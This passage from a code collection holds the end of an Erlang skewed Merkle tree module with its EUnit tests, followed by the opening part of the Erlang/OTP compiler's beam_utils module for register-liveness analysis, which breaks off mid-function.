%% in order, lists of hashes (proof) and compare it to the RootHash (the
%% last element of the proof). It rebuilds a skewed tree from the first
%% sibling hash upwards and compares the resulting root hash.
%% @end
-spec verify_proof(hash(), hash_function(), [hash(),...]) -> boolean().
verify_proof(HashToVerify, _HashFun, [RootHash]) ->
    %% Single-element proof: the hash must itself be the root.
    HashToVerify == RootHash;
verify_proof(HashToVerify, HashFun, [FirstHash|Hashes]) ->
    RH = lists:last(Hashes),
    %% FirstHash acts as the hash of the (unknown) left subtree below
    %% the proven leaf.
    FirstEmpty = #empty{hash=FirstHash},
    Result = lists:foldl(
        fun(RootHash, Acc) when RootHash == RH ->
                %% Reached the final (root) element: compare rebuilt root.
                ?MODULE:root_hash(Acc) == RootHash;
           (Hash, #skewed{root=Tree, count=Count}=Acc) ->
                %% Stack the next sibling hash as a new leaf.
                Leaf = to_leaf(Hash),
                Node = to_node(Tree, Leaf, tree_hash(Tree), leaf_hash(Leaf), HashFun, Count),
                Acc#skewed{root=Node, count=Count+1}
        end,
        #skewed{root=FirstEmpty, count=0},
        [HashToVerify|Hashes]
    ),
    Result == true.
%% @doc
%% Gets the root hash of the given skewed tree. This is a fast
%% operation since the hash was calculated on construction of the tree.
%% @end
-spec root_hash(skewed()) -> hash().
root_hash(#skewed{root=Tree}) ->
tree_hash(Tree).
%% @doc
%% Get the height of the given skewed tree. This is a fast operation
%% since the height was calculated on construction of the tree.
%% @end
-spec height(skewed()) -> non_neg_integer().
height(#skewed{root=Tree}) ->
tree_height(Tree).
%% @doc
%% get the number of leaves int he skewed tree.
%% @end
-spec count(skewed()) -> non_neg_integer().
count(#skewed{count=Count}) ->
Count.
%% @doc
%% A commonly used hash value for skewed trees. This function
%% will SHA256 hash the given value when it is binary. A convenience
%% form detects non-binary forms and uses term_to_binary/1 to convert
%% other erlang terms to a binary form. It is not recommended to use
%% the non-binary form if the resulting trees or proofs are to be sent
%% over a network.
%% @end
-spec hash_value(any(), 0 | 1) -> hash().
hash_value(Bin, DomainTag) when is_binary(Bin) ->
    %% Domain-separated SHA-256: the one-byte tag (leaf vs. node prefix)
    %% is hashed ahead of the payload. crypto:hash/2 accepts iodata.
    crypto:hash(sha256, [<<DomainTag:8>>, Bin]);
hash_value(Term, DomainTag) ->
    %% Convenience form: serialize non-binary terms first (not
    %% recommended when trees/proofs travel over a network).
    hash_value(term_to_binary(Term), DomainTag).
%% @doc
%% Check if the skewed tree contains a value. Hashes the value with the
%% tree's own hash function and searches the left spine for a matching
%% leaf.
%% @end
-spec contains(skewed() | tree(), any()) -> boolean().
contains(#skewed{count=0}, _Value) ->
    false;
contains(#skewed{root=Tree, hash_function=HashFun}, Value) ->
    %% Fix: hash with the tree's stored hash function. The previous code
    %% always used the default hash_value/2, so contains/2 returned false
    %% for every value in a tree built with a custom hash function
    %% (new/1 with a fun, or new/2).
    Hash = HashFun(Value, ?LEAF_PREFIX),
    case contains(Tree, Hash, []) of
        false -> false;
        _ -> true
    end.
%%====================================================================
%% Internal functions
%%====================================================================
%% Walk down the left spine looking for a leaf with the given hash,
%% accumulating the sibling hashes needed for a proof. In a skewed tree
%% every right child is a leaf, so only left subtrees are descended into.
-spec contains(tree(), hash(), [hash()]) -> false | [hash(),...].
contains(#empty{}, _, _Acc) ->
    false;
contains(#node{right=#leaf{hash=Hash}, left=Left}, Hash, Acc) ->
    %% Found the leaf: its sibling is the left subtree's hash.
    [tree_hash(Left)|Acc];
contains(#node{left=Left, right=#leaf{hash=RightHash}}, Hash, Acc) ->
    %% Not here: record the right-leaf sibling and descend left.
    contains(Left, Hash, [RightHash|Acc]).
%% Wrap an already-computed hash as a leaf.
-spec to_leaf(hash()) -> leaf().
to_leaf(Hash) ->
    #leaf{hash=Hash}.

%% Hash a raw value (with the leaf domain prefix) into a leaf.
-spec to_leaf(term(), hash_function()) -> leaf().
to_leaf(Value, HashFun) ->
    #leaf{hash=HashFun(Value, ?LEAF_PREFIX)}.

%% Build an inner node over subtree L and leaf R; the node hash covers
%% the concatenated child hashes under the node domain prefix.
-spec to_node(tree(), leaf(), hash(), hash(), hash_function(), non_neg_integer()) -> tree().
to_node(L, R, LHash, RHash, HashFun, Height) ->
    Hash = HashFun(<<LHash/binary, RHash/binary>>, ?NODE_PREFIX),
    #node{left=L, right=R, height=Height+1, hash=Hash}.

%% Accessors for the precomputed hash/height fields.
-spec leaf_hash(leaf()) -> hash().
leaf_hash(#leaf{hash=Hash}) ->
    Hash.

-spec tree_hash(tree()) -> hash().
tree_hash(#node{hash=Hash}) ->
    Hash;
tree_hash(#empty{hash=Hash}) ->
    Hash.

-spec tree_height(tree()) -> non_neg_integer().
tree_height(#node{height=Height}) ->
    Height;
tree_height(#empty{}) ->
    0.
%% ------------------------------------------------------------------
%% EUNIT Tests
%% ------------------------------------------------------------------
-ifdef(TEST).
new_test() ->
Tree = new(<<1,2,3>>),
?assertEqual(<<1,2,3>>, ?MODULE:root_hash(Tree)),
?assertEqual(0, ?MODULE:count(Tree)).
verify_test() ->
HashFun = fun hash_value/2,
Size = 5,
Tree = lists:foldl(
fun(Value, Acc) ->
add(Value, Acc)
end,
new(),
lists:seq(1, Size)
),
RootHash = ?MODULE:root_hash(Tree),
Value = 3,
%% this is the hash of the node adjacent to the leaf with value 3 (`Value')
Hash2 = <<253,49,101,79,133,255,101,251,21,117,172,62,98,57,87,84,34,25,155,89,71,139,184,212,1,255,127,234,83,163,195,155>>,
ValueHashes = lists:foldr(fun(V, A) -> [HashFun(V, ?LEAF_PREFIX)|A] end, [], lists:seq(Value+1, Size)),
ExpectedProof = [Hash2] ++ ValueHashes ++ [RootHash],
?assertEqual(ExpectedProof, gen_proof(Value, Tree)),
?assert(verify_proof(HashFun(Value, ?LEAF_PREFIX), HashFun, ExpectedProof)),
?assertNot(verify_proof(HashFun(Value, ?LEAF_PREFIX), HashFun, [RootHash])),
?assert(verify_proof(RootHash, HashFun, [RootHash])),
ok.
proof_test() ->
HashFun = fun hash_value/2,
?assertEqual(not_found, gen_proof(lol, new())),
Size = 5,
Tree = lists:foldl(
fun(Value, Acc) ->
add(Value, Acc)
end,
new(HashFun(7, ?LEAF_PREFIX)),
lists:seq(1, Size)
),
?assertEqual(not_found, gen_proof(10, Tree)),
?assertNotEqual(not_found, gen_proof(2, Tree)),
?assertEqual(not_found, gen_proof(7, Tree)),
ok.
contains_test() ->
Size = 5,
Tree = lists:foldl(
fun(Value, Acc) ->
add(Value, Acc)
end,
new(),
lists:seq(1, Size)
),
?assertEqual(true, lists:all(fun(I) ->
true == contains(Tree, I)
end,
lists:seq(1, Size))),
?assertEqual(true, lists:all(fun(I) ->
false == contains(Tree, I)
end,
lists:seq(-10, 0))),
%% Check that empty tree contains no value
Tree2 = new(),
?assertEqual(true, lists:all(fun(I) ->
false == contains(Tree2, I)
end,
lists:seq(-1, 10))),
ok.
height_test() ->
Tree0 = new(),
?assertEqual(0, height(Tree0)),
Tree1 = lists:foldl(
fun(Value, Acc) ->
add(Value, Acc)
end,
new(),
lists:seq(1, 10)
),
io:format("Tree1: ~p~n", [Tree1]),
?assertEqual(10, height(Tree1)),
?assertEqual(0, tree_height(#empty{hash= <<>>})),
ok.
construct_test() ->
Tree0 = new(crypto:hash(sha256, "yolo")),
?assertEqual(0, height(Tree0)),
Tree1 = add("hello", Tree0),
?assertEqual(1, height(Tree1)),
Tree2 = add("namaste", Tree1),
?assertEqual(2, height(Tree2)),
ok.
count_test() ->
Tree0 = new(),
?assertEqual(0, count(Tree0)),
Tree1 = lists:foldl(
fun(Value, Acc) ->
add(Value, Acc)
end,
new(),
lists:seq(1, 10)
),
?assertEqual(10, count(Tree1)),
ok.
-endif. | src/skewed.erl | 0.835047 | 0.560012 | skewed.erl | starcoder |
%%
%% %CopyrightBegin%
%%
%% Copyright Ericsson AB 2007-2018. All Rights Reserved.
%%
%% Licensed under the Apache License, Version 2.0 (the "License");
%% you may not use this file except in compliance with the License.
%% You may obtain a copy of the License at
%%
%% http://www.apache.org/licenses/LICENSE-2.0
%%
%% Unless required by applicable law or agreed to in writing, software
%% distributed under the License is distributed on an "AS IS" BASIS,
%% WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
%% See the License for the specific language governing permissions and
%% limitations under the License.
%%
%% %CopyrightEnd%
%%
%% Purpose : Common utilities used by several optimization passes.
%%
-module(beam_utils).
-export([is_killed/3,is_killed_at/3,is_not_used/3,
empty_label_index/0,index_label/3,index_labels/1,replace_labels/4,
code_at/2,bif_to_test/3,is_pure_test/1,
combine_heap_needs/2,
split_even/1
]).
-export_type([code_index/0,module_code/0,instruction/0]).
-import(lists, [flatmap/2,map/2,member/2,sort/1,reverse/1]).
-define(is_const(Val), (Val =:= nil orelse
element(1, Val) =:= integer orelse
element(1, Val) =:= float orelse
element(1, Val) =:= atom orelse
element(1, Val) =:= literal)).
%% instruction() describes all instructions that are used during optimzation
%% (from beam_a to beam_z).
-type instruction() :: atom() | tuple().
-type code_index() :: gb_trees:tree(beam_asm:label(), [instruction()]).
-type int_function() :: {'function',beam_asm:function_name(),arity(),
beam_asm:label(),[instruction()]}.
-type module_code() ::
{module(),[_],[_],[int_function()],pos_integer()}.
%% Internal types.
-type fail() :: beam_asm:fail() | 'fail'.
-type test() :: {'test',atom(),fail(),[beam_asm:src()]} |
{'test',atom(),fail(),integer(),list(),beam_asm:reg()}.
-type result_cache() :: gb_trees:tree(beam_asm:label(), 'killed' | 'used').
-record(live,
{lbl :: code_index(), %Label to code index.
res :: result_cache()}). %Result cache for each label.
%% is_killed(Register, [Instruction], State) -> true|false
%% Determine whether a register is killed by the instruction sequence.
%% If true is returned, it means that the register will not be
%% referenced in ANY way (not even indirectly by an allocate instruction);
%% i.e. it is OK to enter the instruction sequence with Register
%% containing garbage.
%%
%% The state (constructed by index_instructions/1) is used to allow us
%% to determine the kill state across branches.
-spec is_killed(beam_asm:reg(), [instruction()], code_index()) -> boolean().
is_killed(R, Is, D) ->
St = #live{lbl=D,res=gb_trees:empty()},
case check_liveness(R, Is, St) of
{killed,_} -> true;
{exit_not_used,_} -> false;
{_,_} -> false
end.
%% is_killed_at(Reg, Lbl, State) -> true|false
%% Determine whether Reg is killed at label Lbl.
-spec is_killed_at(beam_asm:reg(), beam_asm:label(), code_index()) -> boolean().
is_killed_at(R, Lbl, D) when is_integer(Lbl) ->
St0 = #live{lbl=D,res=gb_trees:empty()},
case check_liveness_at(R, Lbl, St0) of
{killed,_} -> true;
{exit_not_used,_} -> false;
{_,_} -> false
end.
%% is_not_used(Register, [Instruction], State) -> true|false
%% Determine whether a register is never used in the instruction sequence
%% (it could still be referenced by an allocate instruction, meaning that
%% it MUST be initialized, but that its value does not matter).
%% The state is used to allow us to determine the usage state
%% across branches.
-spec is_not_used(beam_asm:reg(), [instruction()], code_index()) -> boolean().
is_not_used(R, Is, D) ->
St = #live{lbl=D,res=gb_trees:empty()},
case check_liveness(R, Is, St) of
{used,_} -> false;
{exit_not_used,_} -> true;
{_,_} -> true
end.
%% index_labels(FunctionIs) -> State
%% Index the instruction sequence so that we can quickly
%% look up the instruction following a specific label.
-spec index_labels([instruction()]) -> code_index().
index_labels(Is) ->
index_labels_1(Is, []).
%% empty_label_index() -> State
%% Create an empty label index.
-spec empty_label_index() -> code_index().
empty_label_index() ->
gb_trees:empty().
%% index_label(Label, [Instruction], State) -> State
%% Add an index for a label.
-spec index_label(beam_asm:label(), [instruction()], code_index()) ->
code_index().
index_label(Lbl, Is0, Acc) ->
Is = drop_labels(Is0),
gb_trees:enter(Lbl, Is, Acc).
%% code_at(Label, State) -> [I].
%% Retrieve the code at the given label.
-spec code_at(beam_asm:label(), code_index()) -> [instruction()].
code_at(L, Ll) ->
gb_trees:get(L, Ll).
%% replace_labels(FunctionIs, Tail, ReplaceDb, Fallback) -> FunctionIs.
%% Replace all labels in instructions according to the ReplaceDb.
%% If label is not found the Fallback is called with the label to
%% produce a new one.
-spec replace_labels([instruction()],
[instruction()],
#{beam_asm:label() => beam_asm:label()},
fun((beam_asm:label()) -> term())) -> [instruction()].
replace_labels(Is, Acc, D, Fb) ->
replace_labels_1(Is, Acc, D, Fb).
%% bif_to_test(Bif, [Op], Fail) -> {test,Test,Fail,[Op]}
%% Convert a BIF to a test. Fail if not possible.
-spec bif_to_test(atom(), list(), fail()) -> test().
bif_to_test(is_atom, [_]=Ops, Fail) -> {test,is_atom,Fail,Ops};
bif_to_test(is_boolean, [_]=Ops, Fail) -> {test,is_boolean,Fail,Ops};
bif_to_test(is_binary, [_]=Ops, Fail) -> {test,is_binary,Fail,Ops};
bif_to_test(is_bitstring,[_]=Ops, Fail) -> {test,is_bitstr,Fail,Ops};
bif_to_test(is_float, [_]=Ops, Fail) -> {test,is_float,Fail,Ops};
bif_to_test(is_function, [_]=Ops, Fail) -> {test,is_function,Fail,Ops};
bif_to_test(is_function, [_,_]=Ops, Fail) -> {test,is_function2,Fail,Ops};
bif_to_test(is_integer, [_]=Ops, Fail) -> {test,is_integer,Fail,Ops};
bif_to_test(is_list, [_]=Ops, Fail) -> {test,is_list,Fail,Ops};
bif_to_test(is_map, [_]=Ops, Fail) -> {test,is_map,Fail,Ops};
bif_to_test(is_number, [_]=Ops, Fail) -> {test,is_number,Fail,Ops};
bif_to_test(is_pid, [_]=Ops, Fail) -> {test,is_pid,Fail,Ops};
bif_to_test(is_port, [_]=Ops, Fail) -> {test,is_port,Fail,Ops};
bif_to_test(is_reference, [_]=Ops, Fail) -> {test,is_reference,Fail,Ops};
bif_to_test(is_tuple, [_]=Ops, Fail) -> {test,is_tuple,Fail,Ops};
bif_to_test('=<', [A,B], Fail) -> {test,is_ge,Fail,[B,A]};
bif_to_test('>', [A,B], Fail) -> {test,is_lt,Fail,[B,A]};
bif_to_test('<', [_,_]=Ops, Fail) -> {test,is_lt,Fail,Ops};
bif_to_test('>=', [_,_]=Ops, Fail) -> {test,is_ge,Fail,Ops};
bif_to_test('==', [C,A], Fail) when ?is_const(C) ->
{test,is_eq,Fail,[A,C]};
bif_to_test('==', [_,_]=Ops, Fail) -> {test,is_eq,Fail,Ops};
bif_to_test('/=', [C,A], Fail) when ?is_const(C) ->
{test,is_ne,Fail,[A,C]};
bif_to_test('/=', [_,_]=Ops, Fail) -> {test,is_ne,Fail,Ops};
bif_to_test('=:=', [C,A], Fail) when ?is_const(C) ->
{test,is_eq_exact,Fail,[A,C]};
bif_to_test('=:=', [_,_]=Ops, Fail) -> {test,is_eq_exact,Fail,Ops};
bif_to_test('=/=', [C,A], Fail) when ?is_const(C) ->
{test,is_ne_exact,Fail,[A,C]};
bif_to_test('=/=', [_,_]=Ops, Fail) -> {test,is_ne_exact,Fail,Ops}.
%% is_pure_test({test,Op,Fail,Ops}) -> true|false.
%% Return 'true' if the test instruction does not modify any
%% registers and/or bit syntax matching state.
%%
-spec is_pure_test(test()) -> boolean().
is_pure_test({test,is_eq,_,[_,_]}) -> true;
is_pure_test({test,is_ne,_,[_,_]}) -> true;
is_pure_test({test,is_eq_exact,_,[_,_]}) -> true;
is_pure_test({test,is_ne_exact,_,[_,_]}) -> true;
is_pure_test({test,is_ge,_,[_,_]}) -> true;
is_pure_test({test,is_lt,_,[_,_]}) -> true;
is_pure_test({test,is_nonempty_list,_,[_]}) -> true;
is_pure_test({test,is_tagged_tuple,_,[_,_,_]}) -> true;
is_pure_test({test,test_arity,_,[_,_]}) -> true;
is_pure_test({test,has_map_fields,_,[_|_]}) -> true;
is_pure_test({test,is_bitstr,_,[_]}) -> true;
is_pure_test({test,is_function2,_,[_,_]}) -> true;
is_pure_test({test,Op,_,Ops}) ->
erl_internal:new_type_test(Op, length(Ops)).
%% combine_heap_needs(HeapNeed1, HeapNeed2) -> HeapNeed
%% Combine the heap need for two allocation instructions.
-type heap_need_tag() :: 'floats' | 'words'.
-type heap_need() :: non_neg_integer() |
{'alloc',[{heap_need_tag(),non_neg_integer()}]}.
-spec combine_heap_needs(heap_need(), heap_need()) -> heap_need().
combine_heap_needs(H1, H2) when is_integer(H1), is_integer(H2) ->
H1 + H2;
combine_heap_needs(H1, H2) ->
{alloc,combine_alloc_lists([H1,H2])}.
%% split_even/1
%% [1,2,3,4,5,6] -> {[1,3,5],[2,4,6]}
-spec split_even(list()) -> {list(),list()}.
split_even(Rs) -> split_even(Rs, [], []).
%%%
%%% Local functions.
%%%
%% check_liveness(Reg, [Instruction], #live{}) ->
%% {killed | not_used | used, #live{}}
%% Find out whether Reg is used or killed in instruction sequence.
%%
%% killed - Reg is assigned or killed by an allocation instruction.
%% not_used - the value of Reg is not used, but Reg must not be garbage
%% exit_not_used - the value of Reg is not used, but must not be garbage
%% because the stack will be scanned because an
%% exit BIF will raise an exception
%% used - Reg is used
%% check_liveness/3 dispatches on the first instruction of the sequence;
%% see the comment above for the meaning of the result tags.
%% Fix applied: the put_map/put_tuple/put_list clauses recursed with
%% `[{block,[Set]}||Is]' — a list comprehension with a non-boolean
%% filter — instead of consing the synthesized block onto the remaining
%% instructions (`[{block,[Set]}|Is]'), as the bif/gc_bif/test_heap
%% clauses here already do.
check_liveness({fr,_}, _, St) ->
    %% Conservatively always consider the floating point register used.
    {used,St};
check_liveness(R, [{block,Blk}|Is], St0) ->
    case check_liveness_block(R, Blk, St0) of
        {transparent,St1} ->
            check_liveness(R, Is, St1);
        {alloc_used,St1} ->
            %% Used by an allocating instruction, but value not referenced.
            %% Must check the rest of the instructions.
            not_used(check_liveness(R, Is, St1));
        {Other,_}=Res when is_atom(Other) ->
            Res
    end;
check_liveness(R, [{label,_}|Is], St) ->
    check_liveness(R, Is, St);
check_liveness(R, [{test,_,{f,Fail},As}|Is], St0) ->
    case member(R, As) of
        true ->
            {used,St0};
        false ->
            case check_liveness_at(R, Fail, St0) of
                {killed,St1} ->
                    check_liveness(R, Is, St1);
                {exit_not_used,St1} ->
                    not_used(check_liveness(R, Is, St1));
                {not_used,St1} ->
                    not_used(check_liveness(R, Is, St1));
                {used,_}=Used ->
                    Used
            end
    end;
check_liveness(R, [{test,Op,Fail,Live,Ss,Dst}|Is], St) ->
    %% Check this instruction as a block to get a less conservative
    %% result if the caller is is_not_used/3.
    Block = [{set,[Dst],Ss,{alloc,Live,{bif,Op,Fail}}}],
    check_liveness(R, [{block,Block}|Is], St);
check_liveness(R, [{select,_,R,_,_}|_], St) ->
    {used,St};
check_liveness(R, [{select,_,_,Fail,Branches}|_], St) ->
    check_liveness_everywhere(R, [Fail|Branches], St);
check_liveness(R, [{jump,{f,F}}|_], St) ->
    check_liveness_at(R, F, St);
check_liveness(R, [{case_end,Used}|_], St) ->
    check_liveness_exit(R, Used, St);
check_liveness(R, [{try_case_end,Used}|_], St) ->
    check_liveness_exit(R, Used, St);
check_liveness(R, [{badmatch,Used}|_], St) ->
    check_liveness_exit(R, Used, St);
check_liveness(R, [if_end|_], St) ->
    check_liveness_exit(R, ignore, St);
check_liveness(R, [{func_info,_,_,Ar}|_], St) ->
    case R of
        {x,X} when X < Ar -> {used,St};
        _ -> {killed,St}
    end;
check_liveness(R, [{kill,R}|_], St) ->
    {killed,St};
check_liveness(R, [{kill,_}|Is], St) ->
    check_liveness(R, Is, St);
check_liveness(R, [{bs_init,_,_,none,Ss,Dst}|Is], St) ->
    case member(R, Ss) of
        true ->
            {used,St};
        false ->
            if
                R =:= Dst -> {killed,St};
                true -> check_liveness(R, Is, St)
            end
    end;
check_liveness(R, [{bs_init,_,_,Live,Ss,Dst}|Is], St) ->
    case R of
        {x,X} ->
            case member(R, Ss) of
                true ->
                    {used,St};
                false ->
                    if
                        X < Live ->
                            not_used(check_liveness(R, Is, St));
                        true ->
                            {killed,St}
                    end
            end;
        {y,_} ->
            case member(R, Ss) of
                true -> {used,St};
                false ->
                    %% If the exception is taken, the stack may
                    %% be scanned. Therefore the register is not
                    %% guaranteed to be killed.
                    if
                        R =:= Dst -> {not_used,St};
                        true -> not_used(check_liveness(R, Is, St))
                    end
            end
    end;
check_liveness(R, [{deallocate,_}|Is], St) ->
    case R of
        {y,_} -> {killed,St};
        _ -> check_liveness(R, Is, St)
    end;
check_liveness({x,_}=R, [return|_], St) ->
    case R of
        {x,0} -> {used,St};
        {x,_} -> {killed,St}
    end;
check_liveness(R, [{call,Live,_}|Is], St) ->
    case R of
        {x,X} when X < Live -> {used,St};
        {x,_} -> {killed,St};
        {y,_} -> not_used(check_liveness(R, Is, St))
    end;
check_liveness(R, [{call_ext,Live,_}=I|Is], St) ->
    case R of
        {x,X} when X < Live ->
            {used,St};
        {x,_} ->
            {killed,St};
        {y,_} ->
            case beam_jump:is_exit_instruction(I) of
                false ->
                    not_used(check_liveness(R, Is, St));
                true ->
                    %% We must make sure we don't check beyond this
                    %% instruction or we will fall through into random
                    %% unrelated code and get stuck in a loop.
                    {exit_not_used,St}
            end
    end;
check_liveness(R, [{call_fun,Live}|Is], St) ->
    case R of
        {x,X} when X =< Live -> {used,St};
        {x,_} -> {killed,St};
        {y,_} -> not_used(check_liveness(R, Is, St))
    end;
check_liveness(R, [{apply,Args}|Is], St) ->
    case R of
        {x,X} when X < Args+2 -> {used,St};
        {x,_} -> {killed,St};
        {y,_} -> not_used(check_liveness(R, Is, St))
    end;
check_liveness(R, [{bif,Op,Fail,Ss,D}|Is], St) ->
    Set = {set,[D],Ss,{bif,Op,Fail}},
    check_liveness(R, [{block,[Set]}|Is], St);
check_liveness(R, [{gc_bif,Op,{f,Fail},Live,Ss,D}|Is], St) ->
    Set = {set,[D],Ss,{alloc,Live,{gc_bif,Op,Fail}}},
    check_liveness(R, [{block,[Set]}|Is], St);
check_liveness(R, [{bs_put,{f,0},_,Ss}|Is], St) ->
    case member(R, Ss) of
        true -> {used,St};
        false -> check_liveness(R, Is, St)
    end;
check_liveness(R, [{bs_restore2,S,_}|Is], St) ->
    case R of
        S -> {used,St};
        _ -> check_liveness(R, Is, St)
    end;
check_liveness(R, [{bs_save2,S,_}|Is], St) ->
    case R of
        S -> {used,St};
        _ -> check_liveness(R, Is, St)
    end;
check_liveness(R, [{move,S,D}|Is], St) ->
    case R of
        S -> {used,St};
        D -> {killed,St};
        _ -> check_liveness(R, Is, St)
    end;
check_liveness(R, [{make_fun2,_,_,_,NumFree}|Is], St) ->
    case R of
        {x,X} when X < NumFree -> {used,St};
        {x,_} -> {killed,St};
        {y,_} -> not_used(check_liveness(R, Is, St))
    end;
check_liveness(R, [{'catch'=Op,Y,Fail}|Is], St) ->
    Set = {set,[Y],[],{try_catch,Op,Fail}},
    check_liveness(R, [{block,[Set]}|Is], St);
check_liveness(R, [{'try'=Op,Y,Fail}|Is], St) ->
    Set = {set,[Y],[],{try_catch,Op,Fail}},
    check_liveness(R, [{block,[Set]}|Is], St);
check_liveness(R, [{try_end,Y}|Is], St) ->
    case R of
        Y ->
            {killed,St};
        {y,_} ->
            %% y registers will be used if an exception occurs and
            %% control transfers to the label given in the previous
            %% try/2 instruction.
            {used,St};
        _ ->
            check_liveness(R, Is, St)
    end;
check_liveness(R, [{catch_end,Y}|Is], St) ->
    case R of
        Y -> {killed,St};
        _ -> check_liveness(R, Is, St)
    end;
check_liveness(R, [{get_tuple_element,S,_,D}|Is], St) ->
    case R of
        S -> {used,St};
        D -> {killed,St};
        _ -> check_liveness(R, Is, St)
    end;
check_liveness(R, [{bs_context_to_binary,S}|Is], St) ->
    case R of
        S -> {used,St};
        _ -> check_liveness(R, Is, St)
    end;
check_liveness(R, [{loop_rec,{f,_},{x,0}}|_], St) ->
    case R of
        {x,_} ->
            {killed,St};
        _ ->
            %% y register. Rarely happens. Be very conversative and
            %% assume it's used.
            {used,St}
    end;
check_liveness(R, [{loop_rec_end,{f,Fail}}|_], St) ->
    check_liveness_at(R, Fail, St);
check_liveness(R, [{line,_}|Is], St) ->
    check_liveness(R, Is, St);
check_liveness(R, [{get_map_elements,{f,Fail},S,{list,L}}|Is], St0) ->
    {Ss,Ds} = split_even(L),
    case member(R, [S|Ss]) of
        true ->
            {used,St0};
        false ->
            case check_liveness_at(R, Fail, St0) of
                {killed,St}=Killed ->
                    case member(R, Ds) of
                        true -> Killed;
                        false -> check_liveness(R, Is, St)
                    end;
                Other ->
                    Other
            end
    end;
check_liveness(R, [{put_map,F,Op,S,D,Live,{list,Puts}}|Is], St) ->
    Set = {set,[D],[S|Puts],{alloc,Live,{put_map,Op,F}}},
    %% Fixed: cons onto Is (was an invalid list comprehension `||Is').
    check_liveness(R, [{block,[Set]}|Is], St);
check_liveness(R, [{put_tuple,Ar,D}|Is], St) ->
    Set = {set,[D],[],{put_tuple,Ar}},
    check_liveness(R, [{block,[Set]}|Is], St);
check_liveness(R, [{put_list,S1,S2,D}|Is], St) ->
    Set = {set,[D],[S1,S2],put_list},
    check_liveness(R, [{block,[Set]}|Is], St);
check_liveness(R, [{test_heap,N,Live}|Is], St) ->
    I = {block,[{set,[],[],{alloc,Live,{nozero,nostack,N,[]}}}]},
    check_liveness(R, [I|Is], St);
check_liveness(R, [{allocate_zero,N,Live}|Is], St) ->
    I = {block,[{set,[],[],{alloc,Live,{zero,N,0,[]}}}]},
    check_liveness(R, [I|Is], St);
check_liveness(R, [{get_hd,S,D}|Is], St) ->
    I = {block,[{set,[D],[S],get_hd}]},
    check_liveness(R, [I|Is], St);
check_liveness(R, [{get_tl,S,D}|Is], St) ->
    I = {block,[{set,[D],[S],get_tl}]},
    check_liveness(R, [I|Is], St);
check_liveness(R, [remove_message|Is], St) ->
    check_liveness(R, Is, St);
check_liveness({x,X}, [build_stacktrace|_], St) when X > 0 ->
    {killed,St};
check_liveness(R, [{recv_mark,_}|Is], St) ->
    check_liveness(R, Is, St);
check_liveness(R, [{recv_set,_}|Is], St) ->
    check_liveness(R, Is, St);
check_liveness(R, [{'%',_}|Is], St) ->
    check_liveness(R, Is, St);
check_liveness(_R, Is, St) when is_list(Is) ->
    %% Not implemented. Conservatively assume that the register is used.
    {used,St}.
%% Check the liveness of a register at every label in Labels.  The fold
%% starts from the most optimistic answer (killed); any label where the
%% register turns out to be used overrides it.
check_liveness_everywhere(Reg, Labels, St) ->
    check_liveness_everywhere_1(Reg, Labels, killed, St).
%% Fold a liveness result over a list of jump targets.  Only {f,Lbl}
%% entries are inspected; anything else in the list is skipped.  As
%% soon as one target reports `used' we can stop looking.
check_liveness_everywhere_1(Reg, [{f,Lbl}|Rest], Acc0, St0) ->
    {ResAtLbl,St1} = check_liveness_at(Reg, Lbl, St0),
    Acc = case ResAtLbl of
              %% A killed result never overrides an earlier result.
              killed -> Acc0;
              _ -> ResAtLbl
          end,
    case Acc of
        used -> {used,St1};   %% short-circuit: worst case reached
        _ -> check_liveness_everywhere_1(Reg, Rest, Acc, St1)
    end;
check_liveness_everywhere_1(Reg, [_Other|Rest], Acc, St) ->
    check_liveness_everywhere_1(Reg, Rest, Acc, St);
check_liveness_everywhere_1(_Reg, [], Acc, St) ->
    {Acc,St}.
%% check_liveness_at(Reg, Label, State) -> {Result,State'}
%%  Determine the liveness of Reg at the instruction sequence that
%%  Label refers to.  Results are memorized in State#live.res so that
%%  each label is analyzed at most once; #live.lbl maps labels to their
%%  instruction sequences.
check_liveness_at(R, Lbl, #live{lbl=Ll,res=ResMemorized}=St0) ->
case gb_trees:lookup(Lbl, ResMemorized) of
{value,Res} ->
%% Already computed for this label; reuse the cached result.
{Res,St0};
none ->
{Res,St} = case gb_trees:lookup(Lbl, Ll) of
{value,Is} -> check_liveness(R, Is, St0);
%% Unknown label: be conservative and assume `used'.
none -> {used,St0}
end,
{Res,St#live{res=gb_trees:insert(Lbl, Res, St#live.res)}}
end.
%% Downgrade any liveness result except `used' to `not_used';
%% `used' is passed through unchanged.
not_used({used,_}=Result) ->
    Result;
not_used({_AnyOther,St}) ->
    {not_used,St}.
%% check_liveness_exit(Reg, ExitArg, State) -> {Result,State'}
%%  Liveness of Reg at an exit instruction whose argument is ExitArg.
%%  The first clause must come first: if Reg is the exit argument
%%  itself it is used.  Otherwise x registers are killed and y
%%  registers are referenced but their values unused (exit_not_used).
check_liveness_exit(R, R, St) -> {used,St};
check_liveness_exit({x,_}, _, St) -> {killed,St};
check_liveness_exit({y,_}, _, St) -> {exit_not_used,St}.
%% check_liveness_block(Reg, [Instruction], State) ->
%% {killed | not_used | used | alloc_used | transparent,State'}
%% Finds out how Reg is used in the instruction sequence inside a block.
%% Returns one of:
%% killed - Reg is assigned a new value or killed by an
%% allocation instruction
%% not_used - The value is not used, but the register is referenced
%% e.g. by an allocation instruction
%% transparent - Reg is neither used nor killed
%% alloc_used - Used only in an allocate instruction
%% used - Reg is explicitly used by an instruction
%%
%% Annotations are not allowed.
%%
%% (Unknown instructions will cause an exception.)
%% See the contract in the comment block above.  The clauses below
%% special-case allocation operations (which kill all x registers at or
%% above the Live count) and try_catch sets (which kill the y register
%% they initialize).
check_liveness_block({x,X}=R, [{set,Ds,Ss,{alloc,Live,Op}}|Is], St0) ->
if
X >= Live ->
%% An allocation kills every x register numbered >= Live.
{killed,St0};
true ->
case check_liveness_block_1(R, Ss, Ds, Op, Is, St0) of
{transparent,St} -> {alloc_used,St};
{_,_}=Res -> not_used(Res)
end
end;
check_liveness_block({y,_}=R, [{set,Ds,Ss,{alloc,_Live,Op}}|Is], St0) ->
case check_liveness_block_1(R, Ss, Ds, Op, Is, St0) of
{transparent,St} -> {alloc_used,St};
{_,_}=Res -> not_used(Res)
end;
check_liveness_block({y,_}=R, [{set,Ds,Ss,{try_catch,_,Op}}|Is], St0) ->
case Ds of
[R] ->
%% The try_catch initializes exactly this y register.
{killed,St0};
_ ->
case check_liveness_block_1(R, Ss, Ds, Op, Is, St0) of
{exit_not_used,St} ->
{used,St};
{transparent,St} ->
%% Conservatively assume that it is used.
{used,St};
{_,_}=Res ->
Res
end
end;
